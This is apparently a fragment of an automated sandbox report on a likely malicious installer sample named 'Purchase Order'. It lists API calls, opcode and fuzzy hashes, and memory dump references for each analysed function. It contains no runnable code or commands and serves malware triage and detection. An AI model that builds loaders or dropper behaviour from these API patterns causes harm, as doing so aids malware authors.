                                                                                                  • Opcode ID: 65fbc6128c6ea6ccac0771d36d25ae40eb91bbe92aaef5046d3fe99f3cf24475
                                                                                                  • Instruction ID: 45e6817f5ac0ad5077c8573445b5e51b6f54d3a00a8772886ac111494e5e57ea
                                                                                                  • Opcode Fuzzy Hash: 65fbc6128c6ea6ccac0771d36d25ae40eb91bbe92aaef5046d3fe99f3cf24475
                                                                                                  • Instruction Fuzzy Hash: B52181B1E00109BEEB10EFA4DE49EAF7BB8EB54358F20403AF505B61D1D6B95D019B28
                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202A
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                                                                                    • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                                                                                    • Part of subcall function 00405110: lstrcatA.KERNEL32(0041F510,00402D22,00402D22,0041F510,00000000,00000000,00000000), ref: 0040516C
                                                                                                    • Part of subcall function 00405110: SetWindowTextA.USER32(0041F510,0041F510), ref: 0040517E
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                                                                                    • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                                                                                  • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040204A
                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                  • String ID:
                                                                                                  • API String ID: 2987980305-0
                                                                                                  • Opcode ID: b9f0aec67fea9bc98c5863c357296edba73ca0e05b72c9a1f083ca6005b565f3
                                                                                                  • Instruction ID: 7d08e1e337802b2334af88e0c199d29f708e40c37bf94ee781fb5d0f0b1c297d
                                                                                                  • Opcode Fuzzy Hash: b9f0aec67fea9bc98c5863c357296edba73ca0e05b72c9a1f083ca6005b565f3
                                                                                                  • Instruction Fuzzy Hash: 7B219571E00225F7DB207FA48E49A6E7A74AB44354F20417BF601B22D1D6BE4A42965E
                                                                                                  APIs
                                                                                                  • IsWindowVisible.USER32(?), ref: 004050B3
                                                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 00405104
                                                                                                    • Part of subcall function 00404128: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040413A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                  • String ID:
                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                  • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                                  • Instruction ID: e292fc6bb5149b142bd52d3e096dd2ae09329e4c6d4eed70fd370e7000aba408
                                                                                                  • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                                                                  • Instruction Fuzzy Hash: B2018F71504609ABDF205F11ED84AEF3765EB84750F208037FA01B92D1C77A9D92AFAE
                                                                                                  APIs
                                                                                                  • GetTickCount.KERNEL32 ref: 00405BAD
                                                                                                  • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405BC7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CountFileNameTempTick
                                                                                                  • String ID: nsa
                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                  • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                                  • Instruction ID: bfd989d901498d13fd43eebbd57bf0dae5b4b0e38faf5f28c0e1a6b78de2ea97
                                                                                                  • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                                                                                  • Instruction Fuzzy Hash: B7F082367086046BEB108F55EC04B9B7BACDF91750F10C03BFA08DA1D0E6B5F9548B59
                                                                                                  APIs
                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 004056B1
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004056BE
                                                                                                  Strings
                                                                                                  • Error launching installer, xrefs: 0040569B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                  • String ID: Error launching installer
                                                                                                  • API String ID: 3712363035-66219284
                                                                                                  • Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                                  • Instruction ID: a84e3f3112e4284354e87e930577f618970dfa48977d7da17d28cbc3385d6636
                                                                                                  • Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
                                                                                                  • Instruction Fuzzy Hash: 36E04FB0A002097FEB009B60EC05F7B7ABCE710204F808571BD01F2160D278A8008A78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
                                                                                                  • Instruction ID: 2e33bf0a2efd24b19013112e0e3dc0c5d96cbb3b8ddfa3d6198f03b0ea5f4905
                                                                                                  • Opcode Fuzzy Hash: 813088101d1177fb169553b46c52c2ff17d2ea35d6802c76714b97bf352b3534
                                                                                                  • Instruction Fuzzy Hash: 38A14271E00229CBDF28CFA8C8447ADBBB1FF44305F15806AD856BB281D7789A96DF44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
                                                                                                  • Instruction ID: b6fdc69984dd60fe5839cdbb69547f11a37967466e553f406be5e4f069ddcdf3
                                                                                                  • Opcode Fuzzy Hash: 76287d30da9bd6127f444d76b1a2dea5d718215deeea3e4961f0482c034aff3f
                                                                                                  • Instruction Fuzzy Hash: 06912371E00228CBDF28CF98C8547ADBBB1FF44305F15816AD856BB291C778AA96DF44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
                                                                                                  • Instruction ID: c7cee2028620334147dbeeecb81edbae78790ee6bd2d36d3aed28758d5738f0f
                                                                                                  • Opcode Fuzzy Hash: 9112cbabc6f4a79aea4e3429d0b79d6c933dfda102b28fdb5082a60d62602a4e
                                                                                                  • Instruction Fuzzy Hash: CF813471E00228DBDF24CFA8C844BADBBB1FF44305F25816AD856BB291D7389996DF14
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
                                                                                                  • Instruction ID: 57d0a4a62e73b261e138738b2685f27b9a830e1577229771e06a9dcc4a08ef7a
                                                                                                  • Opcode Fuzzy Hash: db9708fb04e2e0ecb222d306fe81c02053fdbbf4ae968347cebcb7f9112ce6f9
                                                                                                  • Instruction Fuzzy Hash: DC816771E04228DBDF24CFA8C844BADBBB1FF44315F11816AD856BB280C7786996DF44
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
                                                                                                  • Instruction ID: 7a0e56a60353855b6858f4e45cba095cd8fb81da81d2b3e1620468e36a0fecf5
                                                                                                  • Opcode Fuzzy Hash: 51b9571c4f2cef3f00a150e7480631ebf45f04a25ed8f4987f17413b8e50dd21
                                                                                                  • Instruction Fuzzy Hash: E2710371E00228DBDF28CFA8C844BADBBB1FF44305F15806AD856BB291D7389996DF54
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
                                                                                                  • Instruction ID: 640397e2d056f1a05ee02a3664d9fcc147c5dfb75bdb54ac859d1c8af1b059c5
                                                                                                  • Opcode Fuzzy Hash: cd56666480845857346ca32992c88f0ff24d6c501f81c377169dfb98ddf17ec5
                                                                                                  • Instruction Fuzzy Hash: 7F712471E00228DBDF28CF98C844BADBBB1FF44305F15806AD856BB291C7789996DF48
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                                                                                  • Instruction ID: 45e0d9c6199636d87fa33ccb5d6651f7628d4ee42d5e4054af8bad143df77737
                                                                                                  • Opcode Fuzzy Hash: 5b6ae2104ab0ec81b4e73fa48072ed289b5e7c7f1ead31899d3077504e5afad2
                                                                                                  • Instruction Fuzzy Hash: D1714771E00228DBDF28CF98C844BADBBB1FF44305F15806AD956BB291C778AA56DF44
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F$F$F$F
                                                                                                  • API String ID: 0-1844600021
                                                                                                  • Opcode ID: eb7689c5b3905c2ca026ad478d876d9c03d640cca072500bb81b31bca5834a0f
                                                                                                  • Instruction ID: 4fac1fb87ce097a209105ccebe7226a4e62846f28264971cc78444f685a27b04
                                                                                                  • Opcode Fuzzy Hash: eb7689c5b3905c2ca026ad478d876d9c03d640cca072500bb81b31bca5834a0f
                                                                                                  • Instruction Fuzzy Hash: 15416074E052099FCB09DFB8C4416EEBBB6EF86304F1044B9D005AB396DB759D86CB92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360436029.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_110000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                  • API String ID: 0-2351511683
                                                                                                  • Opcode ID: f813ab2b06af68a0e893fd3e4339a2e3f810e8e7ea9f76a949221a427be86f43
                                                                                                  • Instruction ID: 909800a78c5accd58ce53ed372b6e0c3908eb600ce12cef8994d980bc207f4b4
                                                                                                  • Opcode Fuzzy Hash: f813ab2b06af68a0e893fd3e4339a2e3f810e8e7ea9f76a949221a427be86f43
                                                                                                  • Instruction Fuzzy Hash: 120171317481158F876C8E2DD49096977FAAF88B607294579E405CB3F0EB71DD81C790
                                                                                                  APIs
                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405ADF
                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AF7
                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B08
                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405D2C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B11
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.3360575943.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.3360559712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360593659.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000004.00000002.3360633168.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                  • String ID:
                                                                                                  • API String ID: 190613189-0
                                                                                                  • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                                  • Instruction ID: b8bae3ead32ec2695fa88c6f2b94aa478c41e31f8fdb951db119f3f4d21ee890
                                                                                                  • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                                                                  • Instruction Fuzzy Hash: C1F0C231605518BFCB029FA5DC4099FBBB8EF46350B2140A5F800F7250D274FE019BA9